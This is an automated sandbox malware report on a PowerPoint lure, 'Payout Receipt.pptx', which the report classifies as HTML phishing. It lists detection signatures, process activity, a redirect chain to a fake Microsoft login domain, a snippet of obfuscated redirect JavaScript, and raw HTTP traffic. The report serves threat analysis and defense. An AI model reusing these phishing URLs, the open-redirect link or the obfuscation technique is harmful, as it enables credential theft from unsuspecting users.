Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Payout Receipt.pptx

Overview

General Information

Sample name:Payout Receipt.pptx
Analysis ID:1525814
MD5:1417101d84f9b072a9d27567e41b12eb
SHA1:d4ad5741fd589701af1c8270cfedeced334c0956
SHA256:12dda16106f761f8d7508f450b212e3eefdbef67e97ff74afde7ac94ba704498
Infos:

Detection

HTMLPhisher
Score:76
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

AI detected phishing page
Antivirus detection for URL or domain
Yara detected HtmlPhish54
Phishing site detected (based on favicon image match)
Phishing site detected (based on image similarity)
Phishing site detected (based on logo match)
Document contains embedded VBA macros
Document misses a certain OLE stream usually present in this Microsoft Office document type
HTML body contains low number of good links
HTML page contains hidden javascript code
HTML page contains string obfuscation
HTML title does not match URL
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Queries the volume information (name, serial number etc) of a device
Sigma detected: Suspicious Office Outbound Connections
Stores files to the Windows start menu directory

Classification

  • System is w10x64_ra
  • POWERPNT.EXE (PID: 6380 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\POWERPNT.EXE" "C:\Users\user\Desktop\Payout Receipt.pptx" /ou "" MD5: 2A43FE7F9F699F7F53FEBC254F68F46D)
    • ai.exe (PID: 6856 cmdline: "C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe" "4F1F87A3-2D62-4CDB-ABDF-61BB45105DB2" "40BB7578-B581-41D4-B322-FEC0ED1808AE" "6380" "C:\Program Files (x86)\Microsoft Office\Root\Office16\POWERPNT.EXE" "PowerPointCombinedFloatieLreOnline.onnx" MD5: EC652BEDD90E089D9406AFED89A8A8BD)
  • chrome.exe (PID: 5336 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://nomicscare.com/fr/gdpr/cookie-consent/all/?next_url=//crewbloom.s3.amazonaws.com/34873.html MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)
    • chrome.exe (PID: 2980 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2156 --field-trial-handle=1944,i,8800721303449338163,5848358366860922411,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
0.10.id.script.csvJoeSecurity_HtmlPhish_54Yara detected HtmlPhish_54Joe Security
    0.23.i.script.csvJoeSecurity_HtmlPhish_54Yara detected HtmlPhish_54Joe Security
      0.6.pages.csvJoeSecurity_HtmlPhish_54Yara detected HtmlPhish_54Joe Security
        0.7.pages.csvJoeSecurity_HtmlPhish_54Yara detected HtmlPhish_54Joe Security
          0.8.pages.csvJoeSecurity_HtmlPhish_54Yara detected HtmlPhish_54Joe Security
            Source: Network ConnectionAuthor: X__Junior (Nextron Systems): Data: DestinationIp: 192.168.2.17, DestinationIsIpv6: false, DestinationPort: 49709, EventID: 3, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE, Initiated: true, ProcessId: 6380, Protocol: tcp, SourceIp: 13.107.246.60, SourceIsIpv6: false, SourcePort: 443
            No Suricata rule has matched

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: https://crewbloom.s3.amazonaws.com/34873.htmlSlashNext: Label: Credential Stealing type: Phishing & Social Engineering

            Phishing

            barindex
            Source: https://l0gin-microso.ftlivedocs.tech/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638636442697330204.NjIwZWJjNjEtNmMyNi00NTY5LWFhMWItYzQ4NTQyOWEzNGQ0MjMxNjBhODctYjRiNy00ZmQ5LWI0MzMtNWU1NmMxYjE0NWMx&ui_locales=en-US&mkt=en-US&client-request-id=37a08538-dff5-407d-be68-819033033a7a&state=KXouNT3DCC4nJGmZ0UPqr43DvOETQcMOHzyW3XKW_GmmSSP1vhdbuw5XASgqJ79HETi6JwhHJ6QWBKwBMy02TUIwHPB3pd6CKYG_YWqx9kPhyBezozkFI1hhf1DwNAMV6i3WbD94ziRYYdhiW7ILPzoTsrP8EPqDjpPTPwsGlE2ddaYguV0DrAR1iKncN8RtOGlb_uoJSY4fDM1dafLvW1gf5IX7c3_kF1zQXY4vcldCPOaUyZ98s32esN_GOxDd6BxYK5bGLDx5Op0mZGALvw&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueLLM: Score: 9 Reasons: The brand 'Microsoft' is a well-known technology company with a legitimate domain of 'microsoft.com'., The URL 'l0gin-microso.ftlivedocs.tech' contains several suspicious elements: 'l0gin' instead of 'login', 'microso' instead of 'microsoft', and an unusual domain extension '.tech'., The domain 'ftlivedocs.tech' does not match the legitimate domain associated with Microsoft., The use of a hyphen and misspellings in the URL are common phishing tactics., The presence of an input field for 'Email' suggests an attempt to collect sensitive information, which is typical in phishing sites. DOM: 0.8.pages.csv
            Source: Yara matchFile source: 0.10.id.script.csv, type: HTML
            Source: Yara matchFile source: 0.23.i.script.csv, type: HTML
            Source: Yara matchFile source: 0.6.pages.csv, type: HTML
            Source: Yara matchFile source: 0.7.pages.csv, type: HTML
            Source: Yara matchFile source: 0.8.pages.csv, type: HTML
            Source: https://ftlivedocs.techMatcher: Template: microsoft matched with high similarity
            Source: https://crewbloom.s3.amazonaws.com/34873.htmlMatcher: Template: microsoft matched with high similarity
            Source: https://l0gin-microso.ftlivedocs.tech/KUtIdFkaMatcher: Template: microsoft matched with high similarity
            Source: https://l0gin-microso.ftlivedocs.tech/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638636442697330204.NjIwZWJjNjEtNmMyNi00NTY5LWFhMWItYzQ4NTQyOWEzNGQ0MjMxNjBhODctYjRiNy00ZmQ5LWI0MzMtNWU1NmMxYjE0NWMx&ui_locales=en-US&mkt=en-US&client-request-id=37a08538-dff5-407d-be68-819033033a7a&state=KXouNT3DCC4nJGmZ0UPqr43DvOETQcMOHzyW3XKW_GmmSSP1vhdbuw5XASgqJ79HETi6JwhHJ6QWBKwBMy02TUIwHPB3pd6CKYG_YWqx9kPhyBezozkFI1hhf1DwNAMV6i3WbD94ziRYYdhiW7ILPzoTsrP8EPqDjpPTPwsGlE2ddaYguV0DrAR1iKncN8RtOGlb_uoJSY4fDM1dafLvW1gf5IX7c3_kF1zQXY4vcldCPOaUyZ98s32esN_GOxDd6BxYK5bGLDx5Op0mZGALvw&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0Matcher: Template: microsoft matched with high similarity
            Source: https://l0gin-microso.ftlivedocs.tech/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638636442697330204.NjIwZWJjNjEtNmMyNi00NTY5LWFhMWItYzQ4NTQyOWEzNGQ0MjMxNjBhODctYjRiNy00ZmQ5LWI0MzMtNWU1NmMxYjE0NWMx&ui_locales=en-US&mkt=en-US&client-request-id=37a08538-dff5-407d-be68-819033033a7a&state=KXouNT3DCC4nJGmZ0UPqr43DvOETQcMOHzyW3XKW_GmmSSP1vhdbuw5XASgqJ79HETi6JwhHJ6QWBKwBMy02TUIwHPB3pd6CKYG_YWqx9kPhyBezozkFI1hhf1DwNAMV6i3WbD94ziRYYdhiW7ILPzoTsrP8EPqDjpPTPwsGlE2ddaYguV0DrAR1iKncN8RtOGlb_uoJSY4fDM1dafLvW1gf5IX7c3_kF1zQXY4vcldCPOaUyZ98s32esN_GOxDd6BxYK5bGLDx5Op0mZGALvw&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueMatcher: Template: microsoft matched with high similarity
            Source: https://l0gin-microso.ftlivedocs.tech/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638636442697330204.NjIwZWJjNjEtNmMyNi00NTY5LWFhMWItYzQ4NTQyOWEzNGQ0MjMxNjBhODctYjRiNy00ZmQ5LWI0MzMtNWU1NmMxYjE0NWMx&ui_locales=en-US&mkt=en-US&client-request-id=37a08538-dff5-407d-be68-819033033a7a&state=KXouNT3DCC4nJGmZ0UPqr43DvOETQcMOHzyW3XKW_GmmSSP1vhdbuw5XASgqJ79HETi6JwhHJ6QWBKwBMy02TUIwHPB3pd6CKYG_YWqx9kPhyBezozkFI1hhf1DwNAMV6i3WbD94ziRYYdhiW7ILPzoTsrP8EPqDjpPTPwsGlE2ddaYguV0DrAR1iKncN8RtOGlb_uoJSY4fDM1dafLvW1gf5IX7c3_kF1zQXY4vcldCPOaUyZ98s32esN_GOxDd6BxYK5bGLDx5Op0mZGALvw&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueMatcher: Found strong image similarity, brand: MICROSOFT
            Source: https://l0gin-microso.ftlivedocs.tech/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2FvMatcher: Template: microsoft matched
            Source: https://l0gin-microso.ftlivedocs.tech/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638636442697330204.NjIwZWJjNjEtNmMyNi00NTY5LWFhMWItYzQ4NTQyOWEzNGQ0MjMxNjBhODctYjRiNy00ZmQ5LWI0MzMtNWU1NmMxYjE0NWMx&ui_locales=en-US&mkt=en-US&client-request-id=37a08538-dff5-407d-be68-819033033a7a&state=KXouNT3DCC4nJGmZ0UPqr43DvOETQcMOHzyW3XKW_GmmSSP1vhdbuw5XASgqJ79HETi6JwhHJ6QWBKwBMy02TUIwHPB3pd6CKYG_YWqx9kPhyBezozkFI1hhf1DwNAMV6i3WbD94ziRYYdhiW7ILPzoTsrP8EPqDjpPTPwsGlE2ddaYguV0DrAR1iKncN8RtOGlb_uoJSY4fDM1dafLvW1gf5IX7c3_kF1zQXY4vcldCPOaUyZ98s32esN_GOxDd6BxYK5bGLDx5Op0mZGALvw&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: Number of links: 0
            Source: https://crewbloom.s3.amazonaws.com/34873.htmlHTTP Parser: Base64 decoded: https://l0gi
            Source: https://l0gin-microso.ftlivedocs.tech/KUtIdFkaHTTP Parser: Found new string: script . var ip;. function EnterSite() {. window.location.href = 'ht' + 'tps' + ':' + '//' + 'l0g' + 'in' + '-' + 'm' + 'ic' + 'r' + 'os' + 'o' + '.ft' + 'liv' + 'ed' + 'o' + 'cs.' + 't' + 'e' + 'c' + 'h/K' + 'UtI' + 'd' + 'Fka' + '?S' + '=' + 'U' + 'mxu' + 'Hl' + 'o'. }. ..
            Source: https://l0gin-microso.ftlivedocs.tech/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638636442697330204.NjIwZWJjNjEtNmMyNi00NTY5LWFhMWItYzQ4NTQyOWEzNGQ0MjMxNjBhODctYjRiNy00ZmQ5LWI0MzMtNWU1NmMxYjE0NWMx&ui_locales=en-US&mkt=en-US&client-request-id=37a08538-dff5-407d-be68-819033033a7a&state=KXouNT3DCC4nJGmZ0UPqr43DvOETQcMOHzyW3XKW_GmmSSP1vhdbuw5XASgqJ79HETi6JwhHJ6QWBKwBMy02TUIwHPB3pd6CKYG_YWqx9kPhyBezozkFI1hhf1DwNAMV6i3WbD94ziRYYdhiW7ILPzoTsrP8EPqDjpPTPwsGlE2ddaYguV0DrAR1iKncN8RtOGlb_uoJSY4fDM1dafLvW1gf5IX7c3_kF1zQXY4vcldCPOaUyZ98s32esN_GOxDd6BxYK5bGLDx5Op0mZGALvw&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: Title: Sign in to your account does not match URL
            Source: https://l0gin-microso.ftlivedocs.tech/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638636442697330204.NjIwZWJjNjEtNmMyNi00NTY5LWFhMWItYzQ4NTQyOWEzNGQ0MjMxNjBhODctYjRiNy00ZmQ5LWI0MzMtNWU1NmMxYjE0NWMx&ui_locales=en-US&mkt=en-US&client-request-id=37a08538-dff5-407d-be68-819033033a7a&state=KXouNT3DCC4nJGmZ0UPqr43DvOETQcMOHzyW3XKW_GmmSSP1vhdbuw5XASgqJ79HETi6JwhHJ6QWBKwBMy02TUIwHPB3pd6CKYG_YWqx9kPhyBezozkFI1hhf1DwNAMV6i3WbD94ziRYYdhiW7ILPzoTsrP8EPqDjpPTPwsGlE2ddaYguV0DrAR1iKncN8RtOGlb_uoJSY4fDM1dafLvW1gf5IX7c3_kF1zQXY4vcldCPOaUyZ98s32esN_GOxDd6BxYK5bGLDx5Op0mZGALvw&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: <input type="password" .../> found
            Source: https://crewbloom.s3.amazonaws.com/34873.htmlHTTP Parser: No favicon
            Source: https://crewbloom.s3.amazonaws.com/34873.htmlHTTP Parser: No favicon
            Source: https://l0gin-microso.ftlivedocs.tech/KUtIdFkaHTTP Parser: No favicon
            Source: https://l0gin-microso.ftlivedocs.tech/KUtIdFkaHTTP Parser: No favicon
            Source: https://l0gin-microso.ftlivedocs.tech/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638636442697330204.NjIwZWJjNjEtNmMyNi00NTY5LWFhMWItYzQ4NTQyOWEzNGQ0MjMxNjBhODctYjRiNy00ZmQ5LWI0MzMtNWU1NmMxYjE0NWMx&ui_locales=en-US&mkt=en-US&client-request-id=37a08538-dff5-407d-be68-819033033a7a&state=KXouNT3DCC4nJGmZ0UPqr43DvOETQcMOHzyW3XKW_GmmSSP1vhdbuw5XASgqJ79HETi6JwhHJ6QWBKwBMy02TUIwHPB3pd6CKYG_YWqx9kPhyBezozkFI1hhf1DwNAMV6i3WbD94ziRYYdhiW7ILPzoTsrP8EPqDjpPTPwsGlE2ddaYguV0DrAR1iKncN8RtOGlb_uoJSY4fDM1dafLvW1gf5IX7c3_kF1zQXY4vcldCPOaUyZ98s32esN_GOxDd6BxYK5bGLDx5Op0mZGALvw&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0HTTP Parser: No favicon
            Source: https://l0gin-microso.ftlivedocs.tech/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638636442697330204.NjIwZWJjNjEtNmMyNi00NTY5LWFhMWItYzQ4NTQyOWEzNGQ0MjMxNjBhODctYjRiNy00ZmQ5LWI0MzMtNWU1NmMxYjE0NWMx&ui_locales=en-US&mkt=en-US&client-request-id=37a08538-dff5-407d-be68-819033033a7a&state=KXouNT3DCC4nJGmZ0UPqr43DvOETQcMOHzyW3XKW_GmmSSP1vhdbuw5XASgqJ79HETi6JwhHJ6QWBKwBMy02TUIwHPB3pd6CKYG_YWqx9kPhyBezozkFI1hhf1DwNAMV6i3WbD94ziRYYdhiW7ILPzoTsrP8EPqDjpPTPwsGlE2ddaYguV0DrAR1iKncN8RtOGlb_uoJSY4fDM1dafLvW1gf5IX7c3_kF1zQXY4vcldCPOaUyZ98s32esN_GOxDd6BxYK5bGLDx5Op0mZGALvw&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: No <meta name="author".. found
            Source: https://l0gin-microso.ftlivedocs.tech/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638636442697330204.NjIwZWJjNjEtNmMyNi00NTY5LWFhMWItYzQ4NTQyOWEzNGQ0MjMxNjBhODctYjRiNy00ZmQ5LWI0MzMtNWU1NmMxYjE0NWMx&ui_locales=en-US&mkt=en-US&client-request-id=37a08538-dff5-407d-be68-819033033a7a&state=KXouNT3DCC4nJGmZ0UPqr43DvOETQcMOHzyW3XKW_GmmSSP1vhdbuw5XASgqJ79HETi6JwhHJ6QWBKwBMy02TUIwHPB3pd6CKYG_YWqx9kPhyBezozkFI1hhf1DwNAMV6i3WbD94ziRYYdhiW7ILPzoTsrP8EPqDjpPTPwsGlE2ddaYguV0DrAR1iKncN8RtOGlb_uoJSY4fDM1dafLvW1gf5IX7c3_kF1zQXY4vcldCPOaUyZ98s32esN_GOxDd6BxYK5bGLDx5Op0mZGALvw&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: No <meta name="author".. found
            Source: https://l0gin-microso.ftlivedocs.tech/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638636442697330204.NjIwZWJjNjEtNmMyNi00NTY5LWFhMWItYzQ4NTQyOWEzNGQ0MjMxNjBhODctYjRiNy00ZmQ5LWI0MzMtNWU1NmMxYjE0NWMx&ui_locales=en-US&mkt=en-US&client-request-id=37a08538-dff5-407d-be68-819033033a7a&state=KXouNT3DCC4nJGmZ0UPqr43DvOETQcMOHzyW3XKW_GmmSSP1vhdbuw5XASgqJ79HETi6JwhHJ6QWBKwBMy02TUIwHPB3pd6CKYG_YWqx9kPhyBezozkFI1hhf1DwNAMV6i3WbD94ziRYYdhiW7ILPzoTsrP8EPqDjpPTPwsGlE2ddaYguV0DrAR1iKncN8RtOGlb_uoJSY4fDM1dafLvW1gf5IX7c3_kF1zQXY4vcldCPOaUyZ98s32esN_GOxDd6BxYK5bGLDx5Op0mZGALvw&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: No <meta name="copyright".. found
            Source: https://l0gin-microso.ftlivedocs.tech/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638636442697330204.NjIwZWJjNjEtNmMyNi00NTY5LWFhMWItYzQ4NTQyOWEzNGQ0MjMxNjBhODctYjRiNy00ZmQ5LWI0MzMtNWU1NmMxYjE0NWMx&ui_locales=en-US&mkt=en-US&client-request-id=37a08538-dff5-407d-be68-819033033a7a&state=KXouNT3DCC4nJGmZ0UPqr43DvOETQcMOHzyW3XKW_GmmSSP1vhdbuw5XASgqJ79HETi6JwhHJ6QWBKwBMy02TUIwHPB3pd6CKYG_YWqx9kPhyBezozkFI1hhf1DwNAMV6i3WbD94ziRYYdhiW7ILPzoTsrP8EPqDjpPTPwsGlE2ddaYguV0DrAR1iKncN8RtOGlb_uoJSY4fDM1dafLvW1gf5IX7c3_kF1zQXY4vcldCPOaUyZ98s32esN_GOxDd6BxYK5bGLDx5Op0mZGALvw&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: No <meta name="copyright".. found
            Source: unknownHTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.17:49704 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 13.107.246.60:443 -> 192.168.2.17:49709 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 20.190.159.2:443 -> 192.168.2.17:49710 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 20.190.159.2:443 -> 192.168.2.17:49717 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.17:49837 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.17:49837 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 13.107.5.88:443 -> 192.168.2.17:49846 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 2.23.209.133:443 -> 192.168.2.17:49847 version: TLS 1.2
            Source: powerpnt.exeMemory has grown: Private usage: 2MB later: 110MB
            Source: global trafficHTTP traffic detected: GET /ab HTTP/1.1Host: evoke-windowsservices-tas.msedge.netCache-Control: no-store, no-cacheX-PHOTOS-CALLERID: 9NMPJ99VJBWVX-EVOKE-RING: X-WINNEXT-RING: PublicX-WINNEXT-TELEMETRYLEVEL: BasicX-WINNEXT-OSVERSION: 10.0.19045.0X-WINNEXT-APPVERSION: 1.23082.131.0X-WINNEXT-PLATFORM: DesktopX-WINNEXT-CANTAILOR: FalseX-MSEDGE-CLIENTID: {c1afbad7-f7da-40f2-92f9-8846a91d69bd}X-WINNEXT-PUBDEVICEID: dbfen2nYS7HW6ON4OdOknKxxv2CCI5LJBTojzDztjwI=If-None-Match: 2056388360_-1434155563Accept-Encoding: gzip, deflate, br
            Source: Joe Sandbox ViewIP Address: 13.107.246.45 13.107.246.45
            Source: Joe Sandbox ViewIP Address: 146.75.52.159 146.75.52.159
            Source: Joe Sandbox ViewIP Address: 13.107.246.60 13.107.246.60
            Source: Joe Sandbox ViewIP Address: 104.18.95.41 104.18.95.41
            Source: Joe Sandbox ViewJA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
            Source: Joe Sandbox ViewJA3 fingerprint: 6271f898ce5be7dd52b0fc260d0662b3
            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
            Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
            Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
            Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
            Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
            Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.13
            Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.13
            Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
            Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
            Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
            Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
            Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.13
            Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
            Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
            Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
            Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
            Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.13
            Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
            Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
            Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
            Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
            Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
            Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
            Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
            Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.13
            Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
            Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.2
            Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.2
            Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.2
            Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.2
            Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.2
            Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.2
            Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.2
            Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
            Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.2
            Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.2
            Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.2
            Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.2
            Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.2
            Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
            Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.2
            Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.2
            Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.2
            Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.13
            Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
            Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.2
            Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.2
            Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.2
            Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.2
            Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.2
            Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.2
            Source: global trafficHTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=6Xtt1sBzydtZp6M&MD=91XKTh55 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
            Source: global trafficHTTP traffic detected: GET /rules/powerpnt.exe-Production-v19.bundle HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft PowerPoint 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /fr/gdpr/cookie-consent/all/?next_url=//crewbloom.s3.amazonaws.com/34873.html HTTP/1.1Host: nomicscare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /34873.html HTTP/1.1Host: crewbloom.s3.amazonaws.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
